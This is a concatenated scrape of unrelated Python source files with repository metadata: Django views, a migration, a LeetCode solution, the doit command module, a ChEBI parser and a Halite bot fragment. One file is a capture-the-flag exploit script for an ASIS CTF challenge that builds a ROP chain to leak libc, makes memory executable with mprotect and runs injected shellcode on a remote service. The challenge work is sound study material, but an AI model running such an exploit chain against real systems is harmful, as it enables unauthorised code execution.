    """Store the first n fibonacci numbers (posted as 'n_fib') in the session.

    Invalid or non-positive input stores an 'error_msg' instead. Always
    redirects back to the index page.
    """
    raw_value = request.POST.get('n_fib', '')
    try:
        count = int(raw_value)
        if count <= 0:
            request.session['error_msg'] = 'The input must be a positive integer!'
            return redirect('index')
        request.session['wanted_n_fibonaccis'] = count
        request.session['fibonaccis'] = get_nth_fibonacci_numbers(count)
    except ValueError:
        request.session['error_msg'] = 'The input must be a valid integer!'
    return redirect('index')
# @/calculateNthPrimes
def calc_nth_primes(request: HttpRequest):
    """Store the first N prime numbers (posted as 'n_primes') in the session.

    N must be between 1 and 1000; otherwise an 'error_msg' is stored.
    Always redirects back to the index page.

    Note: the parameter annotation was fixed from HttpResponse to
    HttpRequest -- the view receives a request, like its siblings.
    """
    n = request.POST.get('n_primes', '')
    try:
        n = int(n)
        if n > 1000 or n < 1:
            request.session['error_msg'] = 'The input must be between 1 and 1000!'
            return redirect('index')
        request.session['wanted_n_primes'] = n
        request.session['primes'] = get_nth_prime_numbers(n)
    except ValueError:
        request.session['error_msg'] = 'The input must be a valid integer!'
    return redirect('index')
# @/encodeRL
def encode_rl(request: HttpRequest):
    """Run-length encode the posted 'str_to_encode' and store the result.

    A ValueError from the compressor is surfaced as 'error_msg'. Always
    redirects back to the index page.

    Note: the parameter annotation was fixed from HttpResponse to
    HttpRequest -- the view receives a request, like its siblings.
    """
    string = request.POST.get('str_to_encode', '')
    try:
        encoded_str = compress(string)
    except ValueError as e:
        request.session['error_msg'] = str(e)
        return redirect('index')
    request.session['wanted_enc_str'] = string
    request.session['encoded_str'] = encoded_str
    return redirect('index')
# @/decodeRL
def decode_rl(request: HttpRequest):
    """Run-length decode the posted 'str_to_decode' and store the result.

    A ValueError from the decompressor is surfaced as 'error_msg'. Always
    redirects back to the index page.

    Note: the parameter annotation was fixed from HttpResponse to
    HttpRequest -- the view receives a request, like its siblings.
    """
    encoded_string = request.POST.get('str_to_decode', '')
    try:
        decoded_str = decompress(encoded_string)
    except ValueError as e:
        request.session['error_msg'] = str(e)
        return redirect('index')
    request.session['wanted_dec_str'] = encoded_string
    request.session['decoded_str'] = decoded_str
    return redirect('index')
"familyguyuser192@windowslive.com"
] | familyguyuser192@windowslive.com |
8c61aacae9721743fc2841b847755e4a17fce0e8 | fbde0e2a0c93193949db891b6633a5f61ad9f61b | /backend/home/migrations/0001_load_initial_data.py | 99c69f7d511bef2f5fc5e145ed104df74edc71db | [] | no_license | crowdbotics-apps/test-26691 | 7198419c0a613e6702c71cb568ce3bbf737d33aa | 4a6756c674919dd695b059594726f2093627f0f8 | refs/heads/master | 2023-04-20T17:56:38.407147 | 2021-05-14T12:02:01 | 2021-05-14T12:02:01 | 367,349,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | from django.db import migrations
def create_site(apps, schema_editor):
    """Point the default django.contrib.sites record (id=1) at this app's domain."""
    Site = apps.get_model("sites", "Site")
    custom_domain = "test-26691.botics.co"

    site_params = {"name": "test"}
    # Only set the domain when one was generated for this app.
    if custom_domain:
        site_params["domain"] = custom_domain

    Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
    """Data migration that seeds the default Site record."""

    # Must run after the sites framework's schema is finalized.
    dependencies = [
        ("sites", "0002_alter_domain_unique"),
    ]

    operations = [
        migrations.RunPython(create_site),
    ]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
014cf8b22ad535325e225718a87d99269363befe | d51b4c766661af65b4ee6e7c30f8cb4bdd8603e3 | /python/algorithm/leetcode/49.py | d9f5c2be72952c7ae5dda1bf600f8c4d534d1acc | [] | no_license | yanxurui/keepcoding | 3e988c76b123d55b32cf7cc35fbffb12c4ccb095 | d6b9f07e2d1437681fa77fee0687ea9b83cab135 | refs/heads/master | 2021-01-24T09:01:41.306597 | 2020-05-21T05:36:04 | 2020-05-21T05:36:04 | 93,400,267 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | from collections import defaultdict
class Solution(object):
    def groupAnagrams(self, strs):
        """
        :type strs: List[str]
        :rtype: List[List[str]]
        """
        # Words that are anagrams share the same sorted-letter signature,
        # so bucket each word under that signature.
        buckets = defaultdict(list)
        for word in strs:
            buckets[''.join(sorted(word))].append(word)
        return list(buckets.values())
if __name__ == '__main__':
    # Ad-hoc test harness; relies on a local `testfunc` helper module.
    from testfunc import test
    def sort_nest(L):
        # Recursively sort nested lists so order-insensitive comparison works.
        for i in range(len(L)):
            if isinstance(L[i], list):
                L[i] = sort_nest(L[i])
        return sorted(L)
    def compare(a, b):
        '''compare 2 unordered nested list
        '''
        return len(a) == len(b) and sort_nest(a) == sort_nest(b)
    test_data = [
        (
            ["eat", "tea", "tan", "ate", "nat", "bat"],
            [
                ["ate","eat","tea"],
                ["nat","tan"],
                ["bat"]
            ]
        )
    ]
    test(Solution().groupAnagrams, test_data, compare=compare)
| [
"617080352@qq.com"
] | 617080352@qq.com |
51b676bf10693d8682cd739f5ef4b22908e3fe8a | a140b1c2cfcc4d9fe7d4a9fcd51f86bf8d89e41c | /2020.12.11-ASIS_CTF_Finals_2020/babyauth/v00-shellcode.py | 050b95f05ac57989f98ded6682c22009c8eb7789 | [] | no_license | xcode2010/ctf | 6f0e6f76e7cdbe44842576ec49dbbffe0de91a49 | 2c121f1e1171ff0f42a4edfb7a17261cc673adb5 | refs/heads/master | 2023-03-28T07:34:33.695719 | 2021-03-21T17:38:55 | 2021-03-21T18:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | #!/usr/bin/env python3
from pwn import *
# Hard-coded addresses for the target build -- presumably extracted from the
# provided binary/libc; verify against the actual challenge files.
# Binary-side gadgets / symbols:
PERCENT_S_NEWLINE = 0x4019c8
POP_RSI_RET = 0x4017fa
POP_RDI_RET = 0x4019a3
PRINTF_CHK_GOT = 0x603090
RET = 0x401545
USERNAME_READER = 0x4014c0
# Offsets of functions inside the remote libc:
PRINTF_CHK_LIBC = 0x131040
MPROTECT_LIBC = 0x11bb00
# Writable region in the binary used to stage shellcode:
WORK_PAGE = 0x603000
WORK_ADDR = 0x603150
WORK_SIZE = 0xeb0
PAGE_SIZE = 0x1000
POP_RSP_RET = 0x401063
MOV_RDI_R12_CALL_RBP = 0x40183c
POP_RBP_RET = 0x400f08
READ_LIBC = 0x111130
context.arch = 'amd64'
# Final-stage shellcode: write(1, str, len) of a greeting, proving execution.
STAGE3 = asm(r'''
mov rax, 1
mov rdi, 1
lea rsi, [.str + rip]
mov rdx, .str_end - .str
syscall
.str:
.asciz "hello from asm\n"
.str_end:
''')
def connect():
    """Open a pwntools tube to the local test server or the remote service."""
    if args.LOCAL:
        return process(['./server.py'])
    else:
        return remote('69.90.132.134', 3317)
def scanf_ok(x):
    """Return True when *x* contains none of scanf's whitespace separators.

    https://reverseengineering.stackexchange.com/a/10596
    """
    # A payload containing any of these bytes would be truncated when the
    # target reads it via scanf.
    separators = (b'\x09', b'\x0a', b'\x0b', b'\x0c', b'\x0d', b'\x20')
    return not any(sep in x for sep in separators)
def send_stage1(tube):
    """Leak the libc base via a ROP chain run from the username overflow.

    The chain appears to call ___printf_chk with the "%s\\n" format on the
    __printf_chk GOT slot (leaking its resolved address) and then re-enters
    the username reader so a second payload can be sent.

    Returns:
        int: Computed libc base address (asserted page aligned).
    """
    tube.recvuntil(b'Username: ')
    payload = flat({
        0: b'admin\0',
        # 0x38 is presumably the offset from the buffer to the saved return
        # address -- TODO confirm against the binary.
        0x38: b''.join((
            struct.pack('<QQ', POP_RDI_RET, 1),
            struct.pack('<QQ', POP_RSI_RET, PERCENT_S_NEWLINE),
            # pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8f, PRINTF_CHK_GOT, 0, 0),
            # call ___printf_chk; pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8a, 0, 0, 0),
            # it just so happens that r12 == IPC *, so we can restart
            struct.pack('<QQ', POP_RBP_RET, USERNAME_READER),
            struct.pack('<Q', MOV_RDI_R12_CALL_RBP),
        )),
    })
    # The payload travels through scanf, so it must contain no whitespace.
    assert scanf_ok(payload), payload.hex()
    # input('stage1')
    tube.sendline(payload)
    # Read the 6 significant bytes of the leaked pointer, zero-extend to 8.
    printf_chk, = struct.unpack('<Q', tube.recvn(6).ljust(8, b'\x00'))
    libc = printf_chk - PRINTF_CHK_LIBC
    print(f'libc: 0x{libc:x}')
    assert libc & 0xfff == 0
    return libc
def send_stage2(tube, libc):
    """Send the second ROP chain: make the work page executable, then run
    shellcode read from the socket.

    The chain calls mprotect(WORK_PAGE, PAGE_SIZE, 0x7) followed by
    read(0, WORK_ADDR, WORK_SIZE), then jumps to WORK_ADDR where the
    stage-3 shellcode will have been written.

    Args:
        tube: pwntools tube to the target.
        libc (int): libc base address leaked by send_stage1().
    """
    tube.recvuntil(b'Username: ')
    payload = flat({
        0: b'admin\0',
        0x38: b''.join((
            # mprotect(WORK_PAGE, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC)
            struct.pack('<QQ', POP_RDI_RET, WORK_PAGE),
            struct.pack('<QQ', POP_RSI_RET, PAGE_SIZE),
            # pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8f, 0x7, 0, 0),
            struct.pack('<Q', libc + MPROTECT_LIBC),
            # read(0, WORK_ADDR, WORK_SIZE): receive the stage-3 shellcode
            struct.pack('<QQ', POP_RDI_RET, 0),
            struct.pack('<QQ', POP_RSI_RET, WORK_ADDR),
            # pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8f, WORK_SIZE, 0, 0),
            struct.pack('<Q', RET),
            struct.pack('<Q', libc + READ_LIBC),
            # Finally transfer control to the freshly written shellcode.
            struct.pack('<Q', RET),
            struct.pack('<Q', WORK_ADDR),
        ))
    })
    assert scanf_ok(payload)
    # input('stage2')
    tube.sendline(payload)
def pwn_once(tube):
    """Run the full exploit chain: leak libc, stage RWX memory, send shellcode."""
    libc = send_stage1(tube)
    send_stage2(tube, libc)
    # input('stage3')
    tube.send(STAGE3)
def main():
    """Connect once, run the exploit and drop to an interactive session."""
    with connect() as tube:
        pwn_once(tube)
        tube.interactive()


if __name__ == '__main__':
    main()
| [
"mephi42@gmail.com"
] | mephi42@gmail.com |
fcb0ab1bb1d2a7526816655e9c3d133f73dbf1d2 | 9940f0b40f439a7aac3f58089602f26533ade000 | /Ex_Files_RESTful_Web_APIs_Django/Exercise Files/env/lib/python3.7/encodings/cp1255.py | cc8a5a597758f7c8d164dec2cff5a94b7826c421 | [] | no_license | Mosh333/REST_API_in_Django | 948ef0efd3a6a146bd94d148aa8c012ec929af68 | 7703501d5ad5bb14fefe5f734ab5780c11f400c9 | refs/heads/master | 2022-11-27T03:23:39.796926 | 2022-03-12T16:10:43 | 2022-03-12T16:10:43 | 246,197,842 | 0 | 0 | null | 2022-11-22T10:14:06 | 2020-03-10T03:18:04 | Python | UTF-8 | Python | false | false | 1,067 | py | XSym
0107
0760a0cdb76900a66edc55d0c3f5a80c
/usr/local/Cellar/python/3.7.2_1/Frameworks/Python.framework/Versions/3.7/lib/python3.7/encodings/cp1255.py
| [
"howladermoshiur@gmail.com"
] | howladermoshiur@gmail.com |
a1a379a55c101ba392210109d8b279c357d5eff1 | 8dd0191025c90e0c2fe11c9720c37a06d5bd1ca6 | /doit/cmd_base.py | 2b62e24181cb13a79275a291961bc0066cbc951d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | NiKo-jr/doit | bfda91771d55c93ca41819bac73557c032b011d4 | b29fdb15a47406bdcbd024f40f7ec56003269b72 | refs/heads/master | 2021-05-11T11:09:07.962317 | 2018-01-19T12:29:47 | 2018-01-19T12:29:47 | 118,121,376 | 0 | 0 | null | 2018-01-19T12:14:08 | 2018-01-19T12:14:08 | null | UTF-8 | Python | false | false | 14,867 | py | import inspect
import sys
from collections import deque
from . import version
from .cmdparse import CmdOption, CmdParse
from .exceptions import InvalidCommand, InvalidDodoFile
from .dependency import CHECKERS, DbmDB, JsonDB, SqliteDB, Dependency
from .plugin import PluginDict
from . import loader
def version_tuple(ver_in):
    """Convert a version string or tuple into a 3-element list of ints.

    Any part that is not a number (dev0, a2, b4) will be converted to -1.

    Args:
        ver_in (str or sequence): e.g. ``"0.30.3"`` or ``(0, 30, 'dev0')``.

    Returns:
        list: Exactly three ints; non-numeric parts become -1.
    """
    result = []
    if isinstance(ver_in, str):
        parts = ver_in.split('.')
    else:
        parts = ver_in
    for rev in parts:
        try:
            result.append(int(rev))
        except (ValueError, TypeError):
            # Narrowed from a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit. Non-numeric revision markers
            # (dev0, a2, b4, None) still map to -1.
            result.append(-1)
    assert len(result) == 3
    return result
class Command(object):
    """Base class for doit sub-commands that do not use tasks.

    Third-party code should subclass this for custom commands.

    :cvar name: (str) name of sub-cmd to be used from cmdline
    :cvar doc_purpose: (str) single line cmd description
    :cvar doc_usage: (str) describe accepted parameters
    :cvar doc_description: (str) long description/help for cmd
    :cvar cmd_options: (list of dict) see cmdparse.CmdOption for dict format
    """
    # if not specified uses the class name
    name = None
    # doc attributes, should be sub-classed
    doc_purpose = ''
    doc_usage = ''
    doc_description = None # None value will completely omit line from doc
    # sequence of dicts
    cmd_options = tuple()
    # `execute_tasks` indicates whether this command execute task's actions.
    # This is used by the loader to indicate when delayed task creation
    # should be used.
    execute_tasks = False
    def __init__(self, config=None, bin_name='doit', **kwargs):
        """configure command

        :param bin_name: str - name of command line program
        :param config: dict
            Set extra configuration values, this vals can come from:
             * directly passed when using the API - through DoitMain.run()
             * from an INI configuration file
        """
        self.bin_name = bin_name
        self.name = self.get_name()
        # config includes all option values and plugins
        self.config = config if config else {}
        # parser is built lazily by the `cmdparser` property
        self._cmdparser = None
        # config_vals contains cmd option values; section [GLOBAL] applies
        # to every command, the command's own section overrides it
        self.config_vals = {}
        if 'GLOBAL' in self.config:
            self.config_vals.update(self.config['GLOBAL'])
        if self.name in self.config:
            self.config_vals.update(self.config[self.name])
        # Use post-mortem PDB in case of error loading tasks.
        # Only available for `run` command.
        self.pdb = False
    @classmethod
    def get_name(cls):
        """get command name as used from command line"""
        return cls.name or cls.__name__.lower()
    @property
    def cmdparser(self):
        """get CmdParse instance for this command (created on first access)

        initialize option values:
         - Defaults are taken from hard-coded option definitions
         - Defaults are overwritten from user's cfg (INI) file
        """
        if not self._cmdparser:
            self._cmdparser = CmdParse(self.get_options())
            self._cmdparser.overwrite_defaults(self.config_vals)
        return self._cmdparser
    def get_options(self):
        """@return list of CmdOption built from `cmd_options` dicts
        """
        return [CmdOption(opt) for opt in self.cmd_options]
    def execute(self, opt_values, pos_args): # pragma: no cover
        """execute command -- must be implemented by subclasses

        :param opt_values: (dict) with cmd_options values
        :param pos_args: (list) of cmd-line positional arguments
        """
        raise NotImplementedError()
    def parse_execute(self, in_args):
        """helper. just parse parameters and execute command

        @args: see method parse
        @returns: result of self.execute
        """
        params, args = self.cmdparser.parse(in_args)
        self.pdb = params.get('pdb', False)
        return self.execute(params, args)
    def help(self):
        """return help text (purpose, usage, options, long description)"""
        text = []
        text.append("Purpose: {}".format(self.doc_purpose))
        text.append("Usage:   {} {} {}".format(
            self.bin_name, self.name, self.doc_usage))
        text.append('')
        text.append("Options:")
        for opt in self.cmdparser.options:
            text.extend(opt.help_doc())
        if self.doc_description is not None:
            text.append("")
            text.append("Description:")
            text.append(self.doc_description)
        return "\n".join(text)
######################################################################
# choose internal dependency file.
opt_depfile = {
'name': 'dep_file',
'short':'',
'long': 'db-file',
'type': str,
'default': ".doit.db",
'help': "file used to save successful runs [default: %(default)s]"
}
# dependency file DB backend
opt_backend = {
'name': 'backend',
'short':'',
'long': 'backend',
'type': str,
'default': "dbm",
'help': ("Select dependency file backend. [default: %(default)s]")
}
opt_check_file_uptodate = {
'name': 'check_file_uptodate',
'short': '',
'long': 'check_file_uptodate',
'type': str,
'default': 'md5',
'help': """\
Choose how to check if files have been modified.
Available options [default: %(default)s]:
'md5': use the md5sum
'timestamp': use the timestamp
"""
}
#### options related to dodo.py
# select dodo file containing tasks
opt_dodo = {
'name': 'dodoFile',
'short':'f',
'long': 'file',
'type': str,
'default': 'dodo.py',
'help':"load task from dodo FILE [default: %(default)s]"
}
# cwd
opt_cwd = {
'name': 'cwdPath',
'short':'d',
'long': 'dir',
'type': str,
'default': None,
'help':("set path to be used as cwd directory (file paths on " +
"dodo file are relative to dodo.py location).")
}
# seek dodo file on parent folders
opt_seek_file = {
'name': 'seek_file',
'short': 'k',
'long': 'seek-file',
'type': bool,
'default': False,
'env_var': 'DOIT_SEEK_FILE',
'help': ("seek dodo file on parent folders " +
"[default: %(default)s]")
}
class TaskLoader(object):
    """Interface for objects responsible for creating Task instances.

    Subclasses must implement the method `load_tasks`.

    :cvar cmd_options: (list of dict) see cmdparse.CmdOption for dict format
    """
    cmd_options = ()
    def __init__(self):
        # Command names are tracked so that task names clashing with
        # sub-command names can be detected.
        self.cmd_names = []
        # Reference to the config object, filled in by the owning Command.
        self.config = None
    def load_tasks(self, cmd, opt_values, pos_args): # pragma: no cover
        """Create the task list and the DOIT_CONFIG dict.

        :return: (tuple) list of Task, dict with DOIT_CONFIG options
        :param cmd: (doit.cmd_base.Command) current command being executed
        :param opt_values: (dict) with values for cmd_options
        :param pos_args: (list str) positional arguments from command line
        """
        raise NotImplementedError()
    @staticmethod
    def _load_from(cmd, namespace, cmd_list):
        """Extract tasks from a module, or from a dict of module members."""
        if inspect.ismodule(namespace):
            namespace = dict(inspect.getmembers(namespace))
        found_tasks = loader.load_tasks(namespace, cmd_list, cmd.execute_tasks)
        config = loader.load_doit_config(namespace)
        return found_tasks, config
class ModuleTaskLoader(TaskLoader):
    """Task loader that reads task creators from a module or a plain dict.

    Usage: `ModuleTaskLoader(my_module)` or `ModuleTaskLoader(globals())`
    """
    cmd_options = ()
    def __init__(self, mod_dict):
        super().__init__()
        # module object or mapping of member-name -> member
        self.mod_dict = mod_dict
    def load_tasks(self, cmd, params, args):
        # Delegate to the shared helper; members come from the stored namespace.
        return self._load_from(cmd, self.mod_dict, self.cmd_names)
class DodoTaskLoader(TaskLoader):
    """default task-loader, creates tasks from a dodo.py file"""
    cmd_options = (opt_dodo, opt_cwd, opt_seek_file)
    def load_tasks(self, cmd, params, args):
        # Resolve and import the dodo file, honoring the --file, --dir
        # and --seek-file command line options.
        dodo_module = loader.get_module(
            params['dodoFile'],
            params['cwdPath'],
            params['seek_file'])
        return self._load_from(cmd, dodo_module, self.cmd_names)
class DoitCmdBase(Command):
    """Base class for doit commands that operate on tasks (run, list, ...).

    subclass must define:
    cmd_options => list of option dictionary (see CmdOption)
    _execute => method, argument names must be option names
    """
    base_options = (opt_depfile, opt_backend, opt_check_file_uptodate)
    def __init__(self, task_loader=None, cmds=None, **kwargs):
        super(DoitCmdBase, self).__init__(**kwargs)
        self.sel_tasks = None # selected tasks for command
        self.dep_manager = None # Dependency instance, created in execute()
        self.outstream = sys.stdout
        self.loader = self._get_loader(task_loader, cmds)
        self._backends = self.get_backends()
    def get_options(self):
        """from base class - merge base_options, loader_options and cmd_options
        """
        opt_list = (self.base_options + self.loader.cmd_options +
                    self.cmd_options)
        return [CmdOption(opt) for opt in opt_list]
    def _execute(self): # pragma: no cover
        """to be subclassed - actual command implementation"""
        raise NotImplementedError
    @staticmethod
    def check_minversion(minversion):
        """check if this version of doit satisfies the minimum required version

        Minimum version specified by configuration on dodo.
        :raises InvalidDodoFile: if the running doit is too old
        """
        if minversion:
            if version_tuple(minversion) > version_tuple(version.VERSION):
                msg = ('Please update doit. '
                       'Minimum version required is {required}. '
                       'You are using {actual}. ')
                raise InvalidDodoFile(msg.format(required=minversion,
                                                 actual=version.VERSION))
    def get_checker_cls(self, check_file_uptodate):
        """return checker class to be used by dep_manager

        Accepts either a known checker name (str) or a user-defined class.
        """
        if isinstance(check_file_uptodate, str):
            if check_file_uptodate not in CHECKERS:
                msg = ("No check_file_uptodate named '{}'."
                       " Type '{} help run' to see a list "
                       "of available checkers.").format(
                           check_file_uptodate, self.bin_name)
                raise InvalidCommand(msg)
            return CHECKERS[check_file_uptodate]
        else:
            # user defined class
            return check_file_uptodate
    def _get_loader(self, task_loader=None, cmds=None):
        """return task loader

        Priority: explicit API argument > 'loader' plugin from config >
        default DodoTaskLoader.

        :param task_loader: a TaskLoader class
        :param cmds: dict of available commands
        """
        loader = None
        if task_loader:
            loader = task_loader # task_loader set from the API
        elif 'loader' in self.config_vals:
            # a plugin loader
            loader_name = self.config_vals['loader']
            plugins = PluginDict()
            plugins.add_plugins(self.config, 'LOADER')
            loader = plugins.get_plugin(loader_name)()
        else:
            loader = DodoTaskLoader() # default loader
        if cmds:
            loader.cmd_names = list(sorted(cmds.keys()))
        loader.config = self.config
        return loader
    def get_backends(self):
        """return PluginDict of DB backends, including core and plugins"""
        backend_map = {'dbm': DbmDB, 'json': JsonDB, 'sqlite3': SqliteDB}
        # add plugins
        plugins = PluginDict()
        plugins.add_plugins(self.config, 'BACKEND')
        backend_map.update(plugins.to_dict())
        # set choices, sub-classes might not have this option
        if 'backend' in self.cmdparser:
            choices = {k: getattr(v, 'desc', '') for k,v in backend_map.items()}
            self.cmdparser['backend'].choices = choices
        return backend_map
    def execute(self, params, args):
        """load dodo.py, set attributes and call self._execute

        :param params: instance of cmdparse.DefaultUpdate
        :param args: list of string arguments (containing task names)
        """
        self.task_list, dodo_config = self.loader.load_tasks(
            self, params, args)
        # merge config values from dodo.py into params
        params.update_defaults(dodo_config)
        self.check_minversion(params.get('minversion'))
        # set selected tasks for command
        self.sel_tasks = args or params.get('default_tasks')
        # create dep manager
        db_class = self._backends.get(params['backend'])
        checker_cls = self.get_checker_cls(params['check_file_uptodate'])
        # note the command have the responsibility to call dep_manager.close()
        self.dep_manager = Dependency(db_class, params['dep_file'], checker_cls)
        # hack to pass parameter into _execute() calls that are not part
        # of command line options
        params['pos_args'] = args
        params['continue_'] = params.get('continue')
        # magic - create dict based on signature of _execute() method.
        # this done so that _execute() have a nice API with name parameters
        # instead of just taking a dict.
        args_name = list(inspect.signature(self._execute).parameters.keys())
        exec_params = dict((n, params[n]) for n in args_name)
        return self._execute(**exec_params)
# helper functions to find list of tasks
def check_tasks_exist(tasks, name_list):
    """Verify every name in name_list is a known task.

    :raises InvalidCommand: on the first unknown task name
    """
    for task_name in (name_list or ()):
        if task_name not in tasks:
            msg = "'%s' is not a task."
            raise InvalidCommand(msg % task_name)
# this is used by commands that do not execute tasks (list, clean, forget...)
def tasks_and_deps_iter(tasks, sel_tasks, yield_duplicates=False):
    """Iterate over the selected tasks and, transitively, their dependencies.

    Breadth-first over task_dep + setup_tasks.

    @param tasks (dict - Task)
    @param sel_tasks (list - str)
    @param yield_duplicates (bool) re-yield a task every time it is reached
    """
    seen = set()  # names already yielded
    pending = deque(sel_tasks)  # names waiting to be processed
    while pending:
        current = tasks[pending.popleft()]
        seen.add(current.name)
        yield current
        # FIXME this does not take calc_dep into account
        for dep_name in current.task_dep + current.setup_tasks:
            if dep_name in seen or dep_name in pending:
                if yield_duplicates:
                    yield tasks[dep_name]
            else:
                pending.append(dep_name)
def subtasks_iter(tasks, task):
    """Yield the direct dependencies of *task* that are sub-tasks.

    @param tasks (dict - Task)
    @param task (Task)
    """
    for dep_name in task.task_dep:
        candidate = tasks[dep_name]
        if candidate.is_subtask:
            yield candidate
| [
"schettino72@gmail.com"
] | schettino72@gmail.com |
60bd221d9a7201ed61317b388cf986a9fd6e682d | 8eeb9db7f4bc986a8b24c09b8af1ce10dd97689e | /posts/models.py | 4f07bafa70e93300ec6e92397229f9351b72512c | [] | no_license | jotasic/wecode_wanted | e21a400b6582ae8a5b5af7f8242f67575dc91b74 | e291513d8e6353ad6318d0894cf8f78d07d084a7 | refs/heads/main | 2023-08-29T01:36:44.595014 | 2021-10-22T02:39:20 | 2021-10-22T02:39:20 | 418,725,436 | 0 | 0 | null | 2021-10-22T02:45:28 | 2021-10-19T01:20:52 | Python | UTF-8 | Python | false | false | 430 | py | from django.db import models
from django.conf import settings
class Post(models.Model):
    # A user-authored post. ``author`` is nullable with SET_NULL so that
    # deleting a user keeps their posts (with author=None).
    author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True)
    title = models.CharField(max_length=255)
    content = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)  # set once, on insert
    edited_at = models.DateTimeField(auto_now=True)  # refreshed on every save
    class Meta:
        db_table = 'posts'
"embedded61@gmail.com"
] | embedded61@gmail.com |
a27851e4f4a4bde844104c7a71758141934c9c74 | 4be2c72579486ad04a00db0349028de96d2dce89 | /scripts/Helios/commands/Make Motor Boats.py | c403c602b6a5d260ed9ddd810716127baf95914c | [] | no_license | italic-r/maya-prefs | 6a617d40beee8937186b4699c5cead44e01c2d40 | aa21e5e2938dc2698ce5f555ee74a594e08aed2b | refs/heads/master | 2021-09-09T16:31:00.411349 | 2018-03-18T01:40:10 | 2018-03-18T01:40:10 | 86,961,959 | 16 | 8 | null | null | null | null | UTF-8 | Python | false | false | 19 | py | mc.MakeMotorBoats() | [
"italic.rendezvous@gmail.com"
] | italic.rendezvous@gmail.com |
57258779008b8a1bc52126eeb06abb34a183b4e5 | b850aafa66b84b8524cfd87ca6a475cd4d7f48df | /src/bio2bel_chebi/parser/inchis.py | a6a1252d6f077d7d8b260a9316a9bd1ac7e75ecf | [
"MIT"
] | permissive | bio2bel/chebi | 35a738542a6a7ff065a1c95ad8c53e5aa1b63c20 | e73a35cca08441a52117fc159d8f44364b1a8836 | refs/heads/master | 2020-06-26T04:50:09.859382 | 2019-11-13T13:37:25 | 2019-11-13T13:37:25 | 97,003,706 | 0 | 1 | MIT | 2018-11-13T15:40:54 | 2017-07-12T12:13:51 | Python | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
import logging
import os
from urllib.request import urlretrieve
import pandas as pd
from ..constants import INCHIS_DATA_PATH, INCHIS_URL
log = logging.getLogger(__name__)
def download_inchis(force_download=False):
    """Download the compound InChIs file, unless a cached copy exists.

    :param bool force_download: If true, overwrites a previously cached file
    :rtype: str
    """
    if force_download or not os.path.exists(INCHIS_DATA_PATH):
        log.info('downloading %s to %s', INCHIS_URL, INCHIS_DATA_PATH)
        urlretrieve(INCHIS_URL, INCHIS_DATA_PATH)
    else:
        log.info('using cached data at %s', INCHIS_DATA_PATH)
    return INCHIS_DATA_PATH
def get_inchis_df(url=None, cache=True, force_download=False):
    """Gets the compound's inchi keys

    :param Optional[str] url: The URL (or file path) to download. Defaults to the ChEBI data.
    :param bool cache: If true, the data is downloaded to the file system, else it is loaded from the internet
    :param bool force_download: If true, overwrites a previously cached file
    :rtype: pandas.DataFrame
    """
    if cache and url is None:
        url = download_inchis(force_download=force_download)
    # Fall back to the remote URL when no path/URL was resolved.
    source = url if url else INCHIS_URL
    return pd.read_csv(source, sep='\t')
| [
"cthoyt@gmail.com"
] | cthoyt@gmail.com |
c7097092229d956c88ee536374160c1cbf5a2ed6 | 76baf5ff0e8717ab6a17575bc9c126e7eb4e2f28 | /docker/shummie/Bots/shummiev66-11-3.py | f49835ae6e6db751bd27c5c930c4a39c68b513c1 | [] | no_license | nmalaguti/halite-bots | f0e8caf3e9898884e6476ff5d36884a2f4e07309 | 82efde39f83b5c34719d31396c7659d2c2f18c03 | refs/heads/master | 2023-07-15T01:20:00.784928 | 2023-06-29T02:49:35 | 2023-06-29T02:49:35 | 73,758,433 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,124 | py | # ==============================================================================
# Imports
# ==============================================================================
import functools
from functools import wraps
import cProfile
import itertools
import logging
import math
import numpy as np
import random
import scipy.sparse
import sys
import time
from timeit import default_timer as timer
import copy
# ==============================================================================
# Variables
# ==============================================================================
# Bot-wide configuration flags.
botname = "shummie v66-11-3"
print_maps = False  # dump debug map arrays to Maps/ each frame (see print_map)
print_times = False  # log per-function timings (see timethis)
profile = False  # enable cProfile-based profiling
MAX_TURN_TIME = 1.35  # seconds; hard per-turn budget checked in get_moves()
def print_map(npmap, name):
    # Debug helper: dump a map array to Maps/<name><frame>.txt when the
    # print_maps flag is set; otherwise a no-op.
    if not print_maps:
        return
    out_path = "Maps/" + name + str(game.frame) + ".txt"
    np.savetxt(out_path, npmap)
def timethis(f):
    """Decorator: log how long each call to *f* takes when print_times is set.

    NOTE(review): the log line reads ``args[0].frame``, i.e. it assumes the
    decorated function is a Game method -- confirm before reusing elsewhere.
    """
    @wraps(f)
    def wrap(*args, **kw):
        # Use timer (timeit.default_timer, a monotonic clock) instead of
        # time.time(): wall-clock time can jump (NTP) and skew durations.
        # This also matches the file's other timing code (timer() - game.start).
        start = timer()
        result = f(*args, **kw)
        end = timer()
        if print_times:
            logging.debug("Frame: {0} {1} secs to run func: {2}".format(args[0].frame, end - start, f.__name__))
        return result
    return wrap
# ==============================================================================
# Game Class
# ==============================================================================
class Game:
    def __init__(self):
        # Handshake with the Halite environment: read our id, the map size,
        # the production map, then the first frame; finally announce the bot.
        self.my_id = int(get_string())
        map_size_string = get_string()
        self.w, self.h = tuple(map(int, map_size_string.split()))
        production_map_string = get_string()
        # The environment sends row-major (h, w); transpose to index as [x, y].
        self.production_map = np.array(list(map(int, production_map_string.split()))).reshape((self.h, self.w)).transpose()
        self.create_squares_list()
        self.frame = -1
        self.max_turns = 10 * ((self.w * self.h) ** 0.5)
        self.get_frame()
        self.starting_player_count = np.amax(self.owner_map) # Note, for range you'd need to increase the range by 1
        self.create_one_time_maps()
